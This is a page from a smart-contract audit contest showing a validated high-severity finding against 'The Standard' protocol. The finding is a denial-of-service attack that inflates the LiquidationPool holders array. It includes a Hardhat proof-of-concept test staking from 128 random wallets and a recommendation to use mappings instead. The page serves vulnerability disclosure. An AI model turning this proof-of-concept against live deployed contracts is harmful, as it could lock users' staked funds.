The Standard

DeFiHardhat

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

LiquidationPool and LiquidationPoolManager DOS Attack

ryonen

Summary

It is possible for an attacker to fill the LiquidationPool.Holders() array with holders, causing a DOS attack on all functions in both LiquidationPool andLiquidationPoolManager.

Vulnerability Details

We can render the functions LiquidationPool.increasePosition(), LiquidationPool.decreasePosition(), LiquidationPool.distributeFees(), LiquidationPool.distributeAssets(), LiquidationPoolManager.distributeFees(), and LiquidationPoolManager.runLiquidation() useless, leaving users practically only with LiquidationPool.claimRewards(). This could be achieved by filling the LiquidationPool.holders() array with dummy addresses.

Impact

It is possible to render the LiquidationPooland LiquidationPoolManager contracts useless, locking the funds of the holders and leading to a loss of funds.

POC

describe("Multiple holders DOS attack", () => {

it("Test", async () => {

const holders = [];

let stakeValue = ethers.utils.parseEther('10');

for (let i = 0; i < 128; i++) {

wallet = ethers.Wallet.createRandom();

wallet = wallet.connect(ethers.provider);

await network.provider.send("hardhat_setBalance", [

wallet.address,

"0x1000000000000000",

]);

await TST.mint(wallet.address, stakeValue);

await EUROs.mint(wallet.address, stakeValue);

await TST.connect(wallet).approve(LiquidationPool.address, stakeValue);

await EUROs.connect(wallet).approve(LiquidationPool.address, stakeValue);

await LiquidationPool.connect(wallet).increasePosition(stakeValue, stakeValue);

holders.push(wallet);

}

await fastForward(DAY + 1);

const holderRepeated = holders[0];

await TST.mint(holderRepeated.address, stakeValue);

await EUROs.mint(holderRepeated.address, stakeValue);

await TST.connect(holderRepeated).approve(LiquidationPool.address, stakeValue);

await EUROs.connect(holderRepeated).approve(LiquidationPool.address, stakeValue);

const tx = await(await LiquidationPool.connect(holderRepeated).increasePosition(stakeValue, stakeValue)).wait();

console.log(tx.gasUsed);

}).timeout(10000000000)

})

Tools Used

Hardhat

Recommendations

Change the approach to how data is stored and use mappings to resolve most calls in O(1) time complexity.

Updates

Lead Judging Commences

hrishibhat Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

pendingstake-dos

hrishibhat Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

pendingstake-high

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

609

33 USDC / LOC

High Medium

17,500 USDC

Low

2,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!